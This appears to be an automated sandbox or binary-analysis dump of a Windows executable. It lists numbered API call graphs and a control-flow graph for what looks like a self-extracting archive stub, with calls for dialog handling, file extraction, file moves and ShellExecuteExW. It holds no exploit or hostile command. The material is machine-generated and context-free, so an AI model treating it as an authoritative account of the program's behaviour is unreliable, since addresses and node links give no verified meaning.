API calls 2 library calls 25525 182bd0 VariantClear 25478 170ada 51 API calls 2 library calls 24550 16dec2 24551 16decf 24550->24551 24552 15e617 53 API calls 24551->24552 24553 16dedc 24552->24553 24554 154092 _swprintf 51 API calls 24553->24554 24555 16def1 SetDlgItemTextW 24554->24555 24558 16b568 PeekMessageW 24555->24558 24559 16b583 GetMessageW 24558->24559 24560 16b5bc 24558->24560 24561 16b5a8 TranslateMessage DispatchMessageW 24559->24561 24562 16b599 IsDialogMessageW 24559->24562 24561->24560 24562->24560 24562->24561 25526 16b5c0 100 API calls 25527 1677c0 118 API calls 25528 16ffc0 RaiseException _com_error::_com_error CallUnexpected 25480 1662ca 123 API calls __InternalCxxFrameHandler 25483 155ef0 82 API calls 25530 1595f0 80 API calls 24582 1798f0 24590 17adaf 24582->24590 24585 179904 24587 17990c 24588 179919 24587->24588 24598 179920 11 API calls 24587->24598 24591 17ac98 _abort 5 API calls 24590->24591 24592 17add6 24591->24592 24593 17addf 24592->24593 24594 17adee TlsAlloc 24592->24594 24595 16fbbc CatchGuardHandler 5 API calls 24593->24595 24594->24593 24596 1798fa 24595->24596 24596->24585 24597 179869 20 API calls 2 library calls 24596->24597 24597->24587 24598->24585 24599 17abf0 24600 17abfb 24599->24600 24601 17af0a 11 API calls 24600->24601 24602 17ac24 24600->24602 24603 17ac20 24600->24603 24601->24600 24605 17ac50 DeleteCriticalSection 24602->24605 24605->24603 25484 1788f0 7 API calls ___scrt_uninitialize_crt 25532 16fd4f 9 API calls 2 library calls 25485 172cfb 38 API calls 4 library calls 24620 16eae7 24621 16eaf1 24620->24621 24622 16e85d ___delayLoadHelper2@8 14 API calls 24621->24622 24623 16eafe 24622->24623 25486 16f4e7 29 API calls _abort 24625 1513e1 84 API calls 2 library calls 24626 16b7e0 24627 16b7ea __EH_prolog 24626->24627 24794 151316 24627->24794 24630 16b841 24631 16bf0f 24859 16d69e 24631->24859 24632 16b82a 24632->24630 24634 16b89b 24632->24634 24635 16b838 24632->24635 24637 16b92e GetDlgItemTextW 24634->24637 24645 16b8b1 24634->24645 24638 16b83c 24635->24638 24639 16b878 24635->24639 24637->24639 24644 16b96b 24637->24644 24638->24630 24646 15e617 53 API calls 24638->24646 24639->24630 24648 16b95f KiUserCallbackDispatcher 24639->24648 24640 16bf2a SendMessageW 24641 16bf38 24640->24641 24642 16bf52 GetDlgItem SendMessageW 24641->24642 24643 16bf41 SendDlgItemMessageW 24641->24643 24877 16a64d GetCurrentDirectoryW 24642->24877 24643->24642 24649 16b980 GetDlgItem 24644->24649 24791 16b974 24644->24791 24650 15e617 53 API calls 24645->24650 24651 16b85b 24646->24651 24648->24630 24653 16b9b7 SetFocus 24649->24653 24654 16b994 SendMessageW SendMessageW 24649->24654 24655 16b8ce SetDlgItemTextW 24650->24655 24897 15124f SHGetMalloc 24651->24897 24652 16bf82 GetDlgItem 24657 16bfa5 SetWindowTextW 24652->24657 24658 16bf9f 24652->24658 24659 16b9c7 24653->24659 24671 16b9e0 24653->24671 24654->24653 24660 16b8d9 24655->24660 24878 16abab GetClassNameW 24657->24878 24658->24657 24664 15e617 53 API calls 24659->24664 24660->24630 24667 16b8e6 GetMessageW 24660->24667 24661 16b862 24661->24630 24670 16c1fc SetDlgItemTextW 24661->24670 24662 16be55 24665 15e617 53 API calls 24662->24665 24668 16b9d1 24664->24668 24672 16be65 SetDlgItemTextW 24665->24672 24667->24630 24674 16b8fd IsDialogMessageW 24667->24674 24898 16d4d4 24668->24898 24670->24630 24679 15e617 53 API calls 24671->24679 24677 16be79 24672->24677 24674->24660 24675 16b90c TranslateMessage DispatchMessageW 24674->24675 24675->24660 24676 16b9d9 24804 15a0b1 24676->24804 24681 15e617 53 API calls 24677->24681 24680 16ba17 24679->24680 24684 154092 _swprintf 51 API calls 24680->24684 24713 16be9c _wcslen 24681->24713 24683 16bff0 24687 15e617 53 API calls 24683->24687 24688 16c020 24683->24688 24689 16ba29 24684->24689 24685 16c73f 97 API calls 24685->24683 24692 16c003 SetDlgItemTextW 24687->24692 24693 16c73f 97 API calls 24688->24693 24735 16c0d8 24688->24735 24695 16d4d4 16 API calls 24689->24695 24690 16ba73 24810 16ac04 SetCurrentDirectoryW 24690->24810 24691 16ba68 GetLastError 24691->24690 24696 15e617 53 API calls 24692->24696 24698 16c03b 24693->24698 24694 16c18b 24699 16c194 EnableWindow 24694->24699 24700 16c19d 24694->24700 24695->24676 24703 16c017 SetDlgItemTextW 24696->24703 24711 16c04d 24698->24711 24732 16c072 24698->24732 24699->24700 24702 16c1ba 24700->24702 24916 1512d3 GetDlgItem EnableWindow 24700->24916 24701 16beed 24705 15e617 53 API calls 24701->24705 24708 16c1e1 24702->24708 24718 16c1d9 SendMessageW 24702->24718 24703->24688 24704 16ba87 24709 16ba90 GetLastError 24704->24709 24710 16ba9e 24704->24710 24705->24630 24706 16c0cb 24714 16c73f 97 API calls 24706->24714 24708->24630 24719 15e617 53 API calls 24708->24719 24709->24710 24715 16bb11 24710->24715 24720 16baae GetTickCount 24710->24720 24721 16bb20 24710->24721 24914 169ed5 32 API calls 24711->24914 24712 16c1b0 24917 1512d3 GetDlgItem EnableWindow 24712->24917 24713->24701 24722 15e617 53 API calls 24713->24722 24714->24735 24715->24721 24723 16bd56 24715->24723 24718->24708 24719->24661 24726 154092 _swprintf 51 API calls 24720->24726 24729 16bcfb 24721->24729 24730 16bcf1 24721->24730 24731 16bb39 GetModuleFileNameW 24721->24731 24727 16bed0 24722->24727 24819 1512f1 GetDlgItem ShowWindow 24723->24819 24724 16c066 24724->24732 24734 16bac7 24726->24734 24736 154092 _swprintf 51 API calls 24727->24736 24728 16c169 24915 169ed5 32 API calls 24728->24915 24739 15e617 53 API calls 24729->24739 24730->24639 24730->24729 24908 15f28c 82 API calls 24731->24908 24732->24706 24741 16c73f 97 API calls 24732->24741 24733 16bd66 24820 1512f1 GetDlgItem ShowWindow 24733->24820 24811 15966e 24734->24811 24735->24694 24735->24728 24743 15e617 53 API calls 24735->24743 24736->24701 24740 16bd05 24739->24740 24746 154092 _swprintf 51 API calls 24740->24746 24747 16c0a0 24741->24747 24743->24735 24744 16c188 24744->24694 24745 16bb5f 24749 154092 _swprintf 51 API calls 24745->24749 24750 16bd23 24746->24750 24747->24706 24751 16c0a9 DialogBoxParamW 24747->24751 24748 16bd70 24752 15e617 53 API calls 24748->24752 24754 16bb81 CreateFileMappingW 24749->24754 24764 15e617 53 API calls 24750->24764 24751->24639 24751->24706 24756 16bd7a SetDlgItemTextW 24752->24756 24755 16bbe3 GetCommandLineW 24754->24755 24786 16bc60 __InternalCxxFrameHandler 24754->24786 24758 16bbf4 24755->24758 24821 1512f1 GetDlgItem ShowWindow 24756->24821 24757 16baed 24761 16baf4 GetLastError 24757->24761 24762 16baff 24757->24762 24909 16b425 SHGetMalloc 24758->24909 24759 16bc6b ShellExecuteExW 24784 16bc88 24759->24784 24761->24762 24766 15959a 80 API calls 24762->24766 24768 16bd3d 24764->24768 24765 16bd8c SetDlgItemTextW GetDlgItem 24769 16bdc1 24765->24769 24770 16bda9 GetWindowLongW SetWindowLongW 24765->24770 24766->24715 24767 16bc10 24910 16b425 SHGetMalloc 24767->24910 24822 16c73f 24769->24822 24770->24769 24773 16bc1c 24911 16b425 SHGetMalloc 24773->24911 24776 16bccb 24776->24730 24782 16bce1 UnmapViewOfFile CloseHandle 24776->24782 24777 16c73f 97 API calls 24779 16bddd 24777->24779 24778 16bc28 24912 15f3fa 82 API calls 2 library calls 24778->24912 24847 16da52 24779->24847 24782->24730 24783 16bc3f MapViewOfFile 24783->24786 24784->24776 24787 16bcb7 Sleep 24784->24787 24786->24759 24787->24776 24787->24784 24788 16c73f 97 API calls 24792 16be03 24788->24792 24789 16be2c 24913 1512d3 GetDlgItem EnableWindow 24789->24913 24791->24639 24791->24662 24792->24789 24793 16c73f 97 API calls 24792->24793 24793->24789 24795 15131f 24794->24795 24796 151378 24794->24796 24797 151385 24795->24797 24918 15e2e8 62 API calls 2 library calls 24795->24918 24919 15e2c1 GetWindowLongW SetWindowLongW 24796->24919 24797->24630 24797->24631 24797->24632 24800 151341 24800->24797 24801 151354 GetDlgItem 24800->24801 24801->24797 24802 151364 24801->24802 24802->24797 24803 15136a SetWindowTextW 24802->24803 24803->24797 24807 15a0bb 24804->24807 24805 15a175 24805->24690 24805->24691 24806 15a14c 24806->24805 24808 15a2b2 8 API calls 24806->24808 24807->24805 24807->24806 24920 15a2b2 24807->24920 24808->24805 24810->24704 24812 159678 24811->24812 24813 1596d5 CreateFileW 24812->24813 24814 1596c9 24812->24814 24813->24814 24815 15971f 24814->24815 24816 15bb03 GetCurrentDirectoryW 24814->24816 24815->24757 24817 159704 24816->24817 24817->24815 24818 159708 CreateFileW 24817->24818 24818->24815 24819->24733 24820->24748 24821->24765 24823 16c749 __EH_prolog 24822->24823 24824 16bdcf 24823->24824 24825 16b314 ExpandEnvironmentStringsW 24823->24825 24824->24777 24834 16c780 _wcslen _wcsrchr 24825->24834 24827 16b314 ExpandEnvironmentStringsW 24827->24834 24828 16ca67 SetWindowTextW 24828->24834 24831 173e3e 22 API calls 24831->24834 24833 16c855 SetFileAttributesW 24835 16c90f GetFileAttributesW 24833->24835 24846 16c86f __cftof _wcslen 24833->24846 24834->24824 24834->24827 24834->24828 24834->24831 24834->24833 24839 16cc31 GetDlgItem SetWindowTextW SendMessageW 24834->24839 24842 16cc71 SendMessageW 24834->24842 24941 161fbb CompareStringW 24834->24941 24942 16a64d GetCurrentDirectoryW 24834->24942 24944 15a5d1 6 API calls 24834->24944 24945 15a55a FindClose 24834->24945 24946 16b48e 76 API calls 2 library calls 24834->24946 24835->24834 24837 16c921 DeleteFileW 24835->24837 24837->24834 24840 16c932 24837->24840 24839->24834 24841 154092 _swprintf 51 API calls 24840->24841 24843 16c952 GetFileAttributesW 24841->24843 24842->24834 24843->24840 24844 16c967 MoveFileW 24843->24844 24844->24834 24845 16c97f MoveFileExW 24844->24845 24845->24834 24846->24834 24846->24835 24943 15b991 51 API calls 2 library calls 24846->24943 24848 16da5c __EH_prolog 24847->24848 24947 160659 24848->24947 24850 16da8d 24951 155b3d 24850->24951 24852 16daab 24955 157b0d 24852->24955 24856 16dafe 24971 157b9e 24856->24971 24858 16bdee 24858->24788 24860 16d6a8 24859->24860 24861 16a5c6 4 API calls 24860->24861 24862 16d6ad 24861->24862 24863 16bf15 24862->24863 24864 16d6b5 GetWindow 24862->24864 24863->24640 24863->24641 24864->24863 24869 16d6d5 24864->24869 24865 16d6e2 GetClassNameW 25422 161fbb CompareStringW 24865->25422 24867 16d706 GetWindowLongW 24868 16d76a GetWindow 24867->24868 24870 16d716 SendMessageW 24867->24870 24868->24863 24868->24869 24869->24863 24869->24865 24869->24867 24869->24868 24870->24868 24871 16d72c GetObjectW 24870->24871 25423 16a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24871->25423 24873 16d743 25424 16a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24873->25424 25425 16a80c 8 API calls 24873->25425 24876 16d754 SendMessageW DeleteObject 24876->24868 24877->24652 24879 16abcc 24878->24879 24881 16abf1 24878->24881 25426 161fbb CompareStringW 24879->25426 24884 16b093 24881->24884 24882 16abdf 24882->24881 24883 16abe3 FindWindowExW 24882->24883 24883->24881 24885 16b09d __EH_prolog 24884->24885 24886 1513dc 84 API calls 24885->24886 24887 16b0bf 24886->24887 25427 151fdc 24887->25427 24890 16b0eb 24893 1519af 128 API calls 24890->24893 24891 16b0d9 24892 151692 86 API calls 24891->24892 24894 16b0e4 24892->24894 24896 16b10d __InternalCxxFrameHandler ___std_exception_copy 24893->24896 24894->24683 24894->24685 24895 151692 86 API calls 24895->24894 24896->24895 24897->24661 24899 16b568 5 API calls 24898->24899 24900 16d4e0 GetDlgItem 24899->24900 24901 16d536 SendMessageW SendMessageW 24900->24901 24902 16d502 24900->24902 24903 16d572 24901->24903 24904 16d591 SendMessageW SendMessageW SendMessageW 24901->24904 24905 16d50d ShowWindow SendMessageW SendMessageW 24902->24905 24903->24904 24906 16d5e7 SendMessageW 24904->24906 24907 16d5c4 SendMessageW 24904->24907 24905->24901 24906->24676 24907->24906 24908->24745 24909->24767 24910->24773 24911->24778 24912->24783 24913->24791 24914->24724 24915->24744 24916->24712 24917->24702 24918->24800 24919->24797 24921 15a2bf 24920->24921 24922 15a2e3 24921->24922 24923 15a2d6 CreateDirectoryW 24921->24923 24924 15a231 3 API calls 24922->24924 24923->24922 24925 15a316 24923->24925 24926 15a2e9 24924->24926 24928 15a325 24925->24928 24933 15a4ed 24925->24933 24927 15a329 GetLastError 24926->24927 24929 15bb03 GetCurrentDirectoryW 24926->24929 24927->24928 24928->24807 24931 15a2ff 24929->24931 24931->24927 24932 15a303 CreateDirectoryW 24931->24932 24932->24925 24932->24927 24934 16ec50 24933->24934 24935 15a4fa SetFileAttributesW 24934->24935 24936 15a510 24935->24936 24937 15a53d 24935->24937 24938 15bb03 GetCurrentDirectoryW 24936->24938 24937->24928 24939 15a524 24938->24939 24939->24937 24940 15a528 SetFileAttributesW 24939->24940 24940->24937 24941->24834 24942->24834 24943->24846 24944->24834 24945->24834 24946->24834 24948 160666 _wcslen 24947->24948 24975 1517e9 24948->24975 24950 16067e 24950->24850 24952 160659 _wcslen 24951->24952 24953 1517e9 78 API calls 24952->24953 24954 16067e 24953->24954 24954->24852 24956 157b17 __EH_prolog 24955->24956 24992 15ce40 24956->24992 24958 157b32 24959 16eb38 8 API calls 24958->24959 24960 157b5c 24959->24960 24998 164a76 24960->24998 24963 157c7d 24964 157c87 24963->24964 24966 157cf1 24964->24966 25027 15a56d 24964->25027 24969 157d50 24966->24969 25005 158284 24966->25005 24967 157d92 24967->24856 24969->24967 25033 15138b 74 API calls 24969->25033 24972 157bac 24971->24972 24974 157bb3 24971->24974 24973 162297 86 API calls 24972->24973 24973->24974 24976 1517ff 24975->24976 24987 15185a __InternalCxxFrameHandler 24975->24987 24977 151828 24976->24977 24988 156c36 76 API calls __vswprintf_c_l 24976->24988 24979 151887 24977->24979 24984 151847 ___std_exception_copy 24977->24984 24981 173e3e 22 API calls 24979->24981 24980 15181e 24989 156ca7 75 API calls 24980->24989 24983 15188e 24981->24983 24983->24987 24991 156ca7 75 API calls 24983->24991 24984->24987 24990 156ca7 75 API calls 24984->24990 24987->24950 24988->24980 24989->24977 24990->24987 24991->24987 24993 15ce4a __EH_prolog 24992->24993 24994 16eb38 8 API calls 24993->24994 24995 15ce8d 24994->24995 24996 16eb38 8 API calls 24995->24996 24997 15ceb1 24996->24997 24997->24958 24999 164a80 __EH_prolog 24998->24999 25000 16eb38 8 API calls 24999->25000 25001 164a9c 25000->25001 25002 157b8b 25001->25002 25004 160e46 80 API calls 25001->25004 25002->24963 25004->25002 25006 15828e __EH_prolog 25005->25006 25034 1513dc 25006->25034 25008 1582aa 25009 1582bb 25008->25009 25174 159f42 25008->25174 25012 1582f2 25009->25012 25042 151a04 25009->25042 25170 151692 25012->25170 25015 158389 25061 158430 25015->25061 25019 1583e8 25066 151f6d 25019->25066 25020 1582ee 25020->25012 25020->25015 25025 15a56d 7 API calls 25020->25025 25178 15c0c5 CompareStringW _wcslen 25020->25178 25023 1583f3 25023->25012 25070 153b2d 25023->25070 25082 15848e 25023->25082 25025->25020 25028 15a582 25027->25028 25032 15a5b0 25028->25032 25411 15a69b 25028->25411 25030 15a592 25031 15a597 FindClose 25030->25031 25030->25032 25031->25032 25032->24964 25033->24967 25035 1513e1 __EH_prolog 25034->25035 25036 15ce40 8 API calls 25035->25036 25037 151419 25036->25037 25038 16eb38 8 API calls 25037->25038 25041 151474 __cftof 25037->25041 25039 151461 25038->25039 25040 15b505 84 API calls 25039->25040 25039->25041 25040->25041 25041->25008 25043 151a0e __EH_prolog 25042->25043 25055 151a61 25043->25055 25058 151b9b 25043->25058 25180 1513ba 25043->25180 25046 151bc7 25183 15138b 74 API calls 25046->25183 25048 153b2d 101 API calls 25051 151c12 25048->25051 25049 151bd4 25049->25048 25049->25058 25050 151c5a 25054 151c8d 25050->25054 25050->25058 25184 15138b 74 API calls 25050->25184 25051->25050 25053 153b2d 101 API calls 25051->25053 25053->25051 25054->25058 25059 159e80 79 API calls 25054->25059 25055->25046 25055->25049 25055->25058 25056 153b2d 101 API calls 25057 151cde 25056->25057 25057->25056 25057->25058 25058->25020 25059->25057 25060 159e80 79 API calls 25060->25055 25202 15cf3d 25061->25202 25063 158440 25206 1613d2 GetSystemTime SystemTimeToFileTime 25063->25206 25065 1583a3 25065->25019 25179 161b66 72 API calls 25065->25179 25067 151f72 __EH_prolog 25066->25067 25069 151fa6 25067->25069 25207 1519af 25067->25207 25069->25023 25071 153b3d 25070->25071 25072 153b39 25070->25072 25081 159e80 79 API calls 25071->25081 25072->25023 25073 153b4f 25074 153b78 25073->25074 25075 153b6a 25073->25075 25338 15286b 101 API calls 3 library calls 25074->25338 25076 153baa 25075->25076 25337 1532f7 89 API calls 2 library calls 25075->25337 25076->25023 25079 153b76 25079->25076 25339 1520d7 74 API calls 25079->25339 25081->25073 25083 158498 __EH_prolog 25082->25083 25084 1584d5 25083->25084 25097 158513 25083->25097 25364 168c8d 103 API calls 25083->25364 25086 1584f5 25084->25086 25091 15857a 25084->25091 25084->25097 25087 15851c 25086->25087 25088 1584fa 25086->25088 25087->25097 25366 168c8d 103 API calls 25087->25366 25088->25097 25365 157a0d 152 API calls 25088->25365 25091->25097 25340 155d1a 25091->25340 25093 158605 25093->25097 25346 158167 25093->25346 25096 158797 25098 15a56d 7 API calls 25096->25098 25101 158802 25096->25101 25097->25023 25098->25101 25100 15d051 82 API calls 25107 15885d 25100->25107 25352 157c0d 25101->25352 25102 158992 25103 158a5f 25102->25103 25110 1589e1 25102->25110 25108 158ab6 25103->25108 25121 158a6a 25103->25121 25104 15898b 25369 152021 74 API calls 25104->25369 25107->25097 25107->25100 25107->25102 25107->25104 25367 158117 84 API calls 25107->25367 25368 152021 74 API calls 25107->25368 25112 158a4c 25108->25112 25372 157fc0 97 API calls 25108->25372 25109 158ab4 25113 15959a 80 API calls 25109->25113 25110->25112 25114 15a231 3 API calls 25110->25114 25118 158b14 25110->25118 25111 159105 25116 15959a 80 API calls 25111->25116 25112->25109 25112->25118 25113->25097 25117 158a19 25114->25117 25116->25097 25117->25112 25370 1592a3 97 API calls 25117->25370 25118->25111 25130 158b82 25118->25130 25373 1598bc 25118->25373 25119 15ab1a 8 API calls 25122 158bd1 25119->25122 25121->25109 25371 157db2 101 API calls 25121->25371 25125 15ab1a 8 API calls 25122->25125 25143 158be7 25125->25143 25128 158b70 25377 156e98 77 API calls 25128->25377 25130->25119 25131 158cbc 25132 158e40 25131->25132 25133 158d18 25131->25133 25135 158e66 25132->25135 25136 158e52 25132->25136 25156 158d49 25132->25156 25134 158d8a 25133->25134 25137 158d28 25133->25137 25144 158167 19 API calls 25134->25144 25139 163377 75 API calls 25135->25139 25138 159215 123 API calls 25136->25138 25140 158d6e 25137->25140 25147 158d37 25137->25147 25138->25156 25141 158e7f 25139->25141 25140->25156 25380 1577b8 111 API calls 25140->25380 25383 163020 123 API calls 25141->25383 25142 158c93 25142->25131 25378 159a3c 82 API calls 25142->25378 25143->25131 25143->25142 25150 15981a 79 API calls 25143->25150 25148 158dbd 25144->25148 25379 152021 74 API calls 25147->25379 25152 158df5 25148->25152 25153 158de6 25148->25153 25148->25156 25150->25142 25382 159155 93 API calls __EH_prolog 25152->25382 25381 157542 85 API calls 25153->25381 25161 158f85 25156->25161 25384 152021 74 API calls 25156->25384 25158 159090 25158->25111 25159 15a4ed 3 API calls 25158->25159 25162 1590eb 25159->25162 25160 15903e 25359 159da2 25160->25359 25161->25111 25161->25158 25161->25160 25358 159f09 SetEndOfFile 25161->25358 25162->25111 25385 152021 74 API calls 25162->25385 25165 159085 25167 159620 77 API calls 25165->25167 25167->25158 25168 1590fb 25386 156dcb 76 API calls 25168->25386 25171 1516a4 25170->25171 25402 15cee1 25171->25402 25175 159f59 25174->25175 25177 159f63 25175->25177 25410 156d0c 78 API calls 25175->25410 25177->25009 25178->25020 25179->25019 25185 151732 25180->25185 25182 1513d6 25182->25060 25183->25058 25184->25054 25186 151748 25185->25186 25197 1517a0 __InternalCxxFrameHandler 25185->25197 25187 151771 25186->25187 25198 156c36 76 API calls __vswprintf_c_l 25186->25198 25189 1517c7 25187->25189 25194 15178d ___std_exception_copy 25187->25194 25191 173e3e 22 API calls 25189->25191 25190 151767 25199 156ca7 75 API calls 25190->25199 25193 1517ce 25191->25193 25193->25197 25201 156ca7 75 API calls 25193->25201 25194->25197 25200 156ca7 75 API calls 25194->25200 25197->25182 25198->25190 25199->25187 25200->25197 25201->25197 25203 15cf4d 25202->25203 25204 15cf54 25202->25204 25205 15981a 79 API calls 25203->25205 25204->25063 25205->25204 25206->25065 25208 1519bf 25207->25208 25210 1519bb 25207->25210 25211 1518f6 25208->25211 25210->25069 25212 151908 25211->25212 25214 151945 25211->25214 25213 153b2d 101 API calls 25212->25213 25217 151928 25213->25217 25219 153fa3 25214->25219 25217->25210 25220 153fac 25219->25220 25221 153b2d 101 API calls 25220->25221 25223 151966 25220->25223 25236 160e08 25220->25236 25221->25220 25223->25217 25224 151e50 25223->25224 25225 151e5a __EH_prolog 25224->25225 25244 153bba 25225->25244 25227 151e84 25228 151732 78 API calls 25227->25228 25231 151f0b 25227->25231 25229 151e9b 25228->25229 25272 1518a9 78 API calls 25229->25272 25231->25217 25232 151eb3 25234 151ebf _wcslen 25232->25234 25273 161b84 MultiByteToWideChar 25232->25273 25274 1518a9 78 API calls 25234->25274 25237 160e0f 25236->25237 25238 160e2a 25237->25238 25242 156c31 RaiseException CallUnexpected 25237->25242 25240 160e3b SetThreadExecutionState 25238->25240 25243 156c31 RaiseException CallUnexpected 25238->25243 25240->25220 25242->25238 25243->25240 25245 153bc4 __EH_prolog 25244->25245 25246 153bf6 25245->25246 25247 153bda 25245->25247 25249 153e51 25246->25249 25252 153c22 25246->25252 25300 15138b 74 API calls 25247->25300 25317 15138b 74 API calls 25249->25317 25251 153be5 25251->25227 25252->25251 25275 163377 25252->25275 25254 153c71 25257 153c8f 25254->25257 25258 153c9f 25254->25258 25264 153ca3 25254->25264 25255 153d2e 25285 15ab1a 25255->25285 25301 15138b 74 API calls 25257->25301 25258->25264 25302 1520bd 78 API calls 25258->25302 25261 153d41 25265 153dd7 25261->25265 25266 153dc7 25261->25266 25264->25255 25271 153c9a 25264->25271 25303 15d051 25264->25303 25309 163020 123 API calls 25265->25309 25289 159215 25266->25289 25269 153dd5 25269->25271 25310 152021 74 API calls 25269->25310 25311 162297 25271->25311 25272->25232 25273->25234 25274->25231 25276 16338c 25275->25276 25278 163396 ___std_exception_copy 25275->25278 25318 156ca7 75 API calls 25276->25318 25279 1634c6 25278->25279 25280 16341c 25278->25280 25284 163440 __cftof 25278->25284 25320 17238d RaiseException 25279->25320 25319 1632aa 75 API calls 3 library calls 25280->25319 25283 1634f2 25284->25254 25286 15ab28 25285->25286 25288 15ab32 25285->25288 25287 16eb38 8 API calls 25286->25287 25287->25288 25288->25261 25290 15921f __EH_prolog 25289->25290 25321 157c64 25290->25321 25293 1513ba 78 API calls 25294 159231 25293->25294 25324 15d114 25294->25324 25297 15d114 118 API calls 25298 159243 25297->25298 25298->25297 25299 15928a 25298->25299 25333 15d300 97 API calls __InternalCxxFrameHandler 25298->25333 25299->25269 25300->25251 25301->25271 25302->25264 25304 15d084 25303->25304 25305 15d072 25303->25305 25335 15603a 82 API calls 25304->25335 25334 15603a 82 API calls 25305->25334 25308 15d07c 25308->25255 25309->25269 25310->25271 25312 1622a1 25311->25312 25313 1622ba 25312->25313 25316 1622ce 25312->25316 25336 160eed 86 API calls 25313->25336 25315 1622c1 25315->25316 25317->25251 25318->25278 25319->25284 25320->25283 25322 15b146 GetVersionExW 25321->25322 25323 157c69 25322->25323 25323->25293 25329 15d12a __InternalCxxFrameHandler 25324->25329 25325 15d29a 25326 15d2ce 25325->25326 25327 15d0cb 6 API calls 25325->25327 25328 160e08 SetThreadExecutionState RaiseException 25326->25328 25327->25326 25331 15d291 25328->25331 25329->25325 25330 168c8d 103 API calls 25329->25330 25329->25331 25332 15ac05 91 API calls 25329->25332 25330->25329 25331->25298 25332->25329 25333->25298 25334->25308 25335->25308 25336->25315 25337->25079 25338->25079 25339->25076 25341 155d2a 25340->25341 25387 155c4b 25341->25387 25343 155d5d 25345 155d95 25343->25345 25392 15b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25343->25392 25345->25093 25347 158186 25346->25347 25348 158232 25347->25348 25399 15be5e 19 API calls __InternalCxxFrameHandler 25347->25399 25398 161fac CharUpperW 25348->25398 25351 15823b 25351->25096 25353 157c22 25352->25353 25354 157c5a 25353->25354 25400 156e7a 74 API calls 25353->25400 25354->25107 25356 157c52 25401 15138b 74 API calls 25356->25401 25358->25160 25360 159db3 25359->25360 25363 159dc2 25359->25363 25361 159db9 FlushFileBuffers 25360->25361 25360->25363 25361->25363 25362 159e3f SetFileTime 25362->25165 25363->25362 25364->25084 25365->25097 25366->25097 25367->25107 25368->25107 25369->25102 25370->25112 25371->25109 25372->25112 25374 1598c5 GetFileType 25373->25374 25375 158b5a 25373->25375 25374->25375 25375->25130 25376 152021 74 API calls 25375->25376 25376->25128 25377->25130 25378->25131 25379->25156 25380->25156 25381->25156 25382->25156 25383->25156 25384->25161 25385->25168 25386->25111 25393 155b48 25387->25393 25390 155b48 2 API calls 25391 155c6c 25390->25391 25391->25343 25392->25343 25396 155b52 25393->25396 25394 155c3a 25394->25390 25394->25391 25396->25394 25397 15b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25396->25397 25397->25396 25398->25351 25399->25348 25400->25356 25401->25354 25403 15cef2 25402->25403 25408 15a99e 86 API calls 25403->25408 25405 15cf24 25409 15a99e 86 API calls 25405->25409 25407 15cf2f 25408->25405 25409->25407 25410->25177 25412 15a6a8 25411->25412 25413 15a727 FindNextFileW 25412->25413 25414 15a6c1 FindFirstFileW 25412->25414 25416 15a732 GetLastError 25413->25416 25421 15a709 25413->25421 25415 15a6d0 25414->25415 25414->25421 25417 15bb03 GetCurrentDirectoryW 25415->25417 25416->25421 25418 15a6e0 25417->25418 25419 15a6e4 FindFirstFileW 25418->25419 25420 15a6fe GetLastError 25418->25420 25419->25420 25419->25421 25420->25421 25421->25030 25422->24869 25423->24873 25424->24873 25425->24876 25426->24882 25428 159f42 78 API calls 25427->25428 25429 151fe8 25428->25429 25430 152005 25429->25430 25431 151a04 101 API calls 25429->25431 25430->24890 25430->24891 25432 151ff5 25431->25432 25432->25430 25434 15138b 74 API calls 25432->25434 25434->25430 25487 1694e0 GetClientRect 25488 16f2e0 46 API calls __RTC_Initialize 25534 1621e0 26 API calls std::bad_exception::bad_exception 25489 17bee0 GetCommandLineA GetCommandLineW 25536 15f1e8 FreeLibrary

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 268 160863-160886 call 16ec50 GetModuleHandleW 271 1608e7-160b48 268->271 272 160888-16089f GetProcAddress 268->272 275 160c14-160c40 GetModuleFileNameW call 15c29a call 160602 271->275 276 160b4e-160b59 call 1775fb 271->276 273 1608a1-1608b7 272->273 274 1608b9-1608c9 GetProcAddress 272->274 273->274 277 1608e5 274->277 278 1608cb-1608e0 274->278 292 160c42-160c4e call 15b146 275->292 276->275 286 160b5f-160b8d GetModuleFileNameW CreateFileW 276->286 277->271 278->277 287 160b8f-160b9b SetFilePointer 286->287 288 160c08-160c0f CloseHandle 286->288 287->288 290 160b9d-160bb9 ReadFile 287->290 288->275 290->288 294 160bbb-160be0 290->294 297 160c50-160c5b call 16081b 292->297 298 160c7d-160ca4 call 15c310 GetFileAttributesW 292->298 296 160bfd-160c06 call 160371 294->296 296->288 305 160be2-160bfc call 16081b 296->305 297->298 307 160c5d-160c7b CompareStringW 297->307 308 160ca6-160caa 298->308 309 160cae 298->309 305->296 307->298 307->308 308->292 311 160cac 308->311 312 160cb0-160cb5 309->312 311->312 313 160cb7 312->313 314 160cec-160cee 312->314 317 160cb9-160ce0 call 15c310 GetFileAttributesW 313->317 315 160cf4-160d0b call 15c2e4 call 15b146 314->315 316 160dfb-160e05 314->316 327 160d73-160da6 call 154092 AllocConsole 315->327 328 160d0d-160d6e call 16081b * 2 call 15e617 call 154092 call 15e617 call 16a7e4 315->328 322 160ce2-160ce6 317->322 323 160cea 317->323 322->317 325 160ce8 322->325 323->314 325->314 333 160df3-160df5 ExitProcess 327->333 334 160da8-160ded GetCurrentProcessId AttachConsole call 173e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 0016087C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0016088E
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001608BF
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00160B69
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00160B83
                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00160B93
                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00183C7C,00000000), ref: 00160BB1
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00160C09
